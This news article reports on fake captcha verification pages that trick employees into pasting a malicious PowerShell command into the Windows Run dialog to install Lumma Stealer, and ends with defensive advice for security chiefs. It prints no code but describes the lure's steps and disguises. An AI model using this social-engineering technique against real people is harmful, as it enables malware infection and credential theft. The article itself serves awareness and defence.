Several cybersecurity firms have published alerts about threat actors fooling customer employees into downloading malware through fake captcha login verification pages.
Captchas are those annoying tests that websites add to login routines to make sure users are real people and not automated bots. Making a user type in a random number shown in a popup, or click on a series of boxes that show specified pictures is activity that a bot can’t perform.
But while defenders have been warned, threat actors continue to use fake captchas to spread malware, apparently because it’s still a successful tactic.
“I expect we’re going to continue to see this throughout the year,” Ray Canzanese, director of Netskope Threat Labs, said in an interview Thursday. The goal, his company said in a warning published last month, is to spread Lumma Stealer information stealing malware.
“We have seen more of these fake captchas ever single day,” he said. “There is not a weekday that goes by so far this year where we haven’t see someone who ends up on one of these fake pages. We’re talking thousands of people in the month of January. I think we’re going to top thousands in February as well.”
As for why it’s still being used after CISOs have been alerted, Canzanese noted that threat actors don’t have to be successful every time with a tactic – just often enough to make it worthwhile.
Alex Caparo, a cyber threat intelligence analyst at ReliaQuest, said his firm put out a warning in December because of the volume of incidents seen by customers. “We started seeing them in early September of 2024. Between October and early December we saw almost a 2X increase in these attacks in our environment – and a doubling again of that number since then,” he said Thursday.
In fact, he said, one of his firm’s customers faced an attempt to use the fake captcha tactic earlier this week.
It doesn’t help, he added, that security researchers – some legitimate, some not – soon published templates on developer sites like GitHub that threat actors eagerly copied.
How the scam works
Typically, the recent captcha scams try to trick an employee into copying and pasting a malicious script into their Windows PCs.
It often starts with an employee getting an email or text from what looks like a trustworthy source asking them to go to a website related to their company’s business. For example, the message to a developer may say, ‘We have detected a security vulnerability in your repository,’ and asks the target to click on a supposed GitHub link.
However, an individual may also stumble across an infected website after doing an internet search for an application update or instruction manual.
What happens next is the website throws up a box saying something like “Verify You Are Human.” But instead of asking the target to click on a series of photos or type in a number, the target is instructed to copy a [malicious] script or, in a more recent version of the scam, press the Windows button on their keyboards plus the letter R. That triggers Windows Run capability. The target next has to press CTRL+V, which pastes the script into the Run dialogue, and press Enter, executing it.
A variation shows a window that pops up saying ‘Verification Failed.’ The user is told that, to solve the problem, they have to copy and execute a script or install a so-called root certificate.
Sometimes the verification page is labelled “CloudFlare,” in hopes of convincing the target of the legitimacy of what they’re being asked to do by using a trusted brand name.
Whatever the ruse, the script itself is a malicious PowerShell command to contact a command-and-control server, which eventually sends the Lumma Stealer or other malware to the user’s computer.
In short, the goal is to get the employee to download the malware themself, rather than the attacker putting it in place.
“We have seen serious development [of the tactic] since September,” said Michal Salat, head of threat intelligence at Gen Digital, owner of the Norton, Avast, AVG and other cybersecurity brands. “Originally it started with simple scripts, [and] continued with many different tactics to make it look more legitimate. Because it was fairly successful infecting people, more attack groups started using these techniques. We not only saw more sophistication, but also saw the spread to other malware strains or distribution chains.”
Gen Digital blogged about this tactic last September.
The latest trick is to change the script to be pasted from computer code — which might look suspicious — into a verification sentence with a smiley emoji or a checkmark, to dupe the user into thinking they’re doing the right thing.
Advice for CISOs
Canzanese and Caparo offer the following advice to CISOs to mitigate the threat:
- Include warnings of this tactic in regular employee security awareness training. In some ways, the advice to staff is simple: Always refuse requests to paste commands into your computer. And remind employees to tell their families look out for this kind of scam. Consumers will encounter it when hunting for cracked/hacked commercial software that they want to get for free, or while looking for YouTube tutorials.
- Monitor the use of PowerShell. In most organizations only a small number of employees should be allowed to access PowerShell.
- Windows administrators should restrict the use of the Windows Run command to only those who need it, says Caparo. Set up a group policy under User Configuration/Administrative Templates/Start Menu and Task bar, and find the option that says “Remove Run menu from Start Menu.
“If you apply that policy on non-administrator and non development machines, it should stop regular users from being able to run malware using this specific technique,” he said, - Disable the ability of browsers on employee PCs to save passwords. ReliaQuest notes that this helps protect against infostealers that swallow up stored credentials.
- Enable phishing-resistant two-factor authentication in case credentials are stolen.
- Use an endpoint detection and response (EDR) solution to detect malware and block malicious scripts.
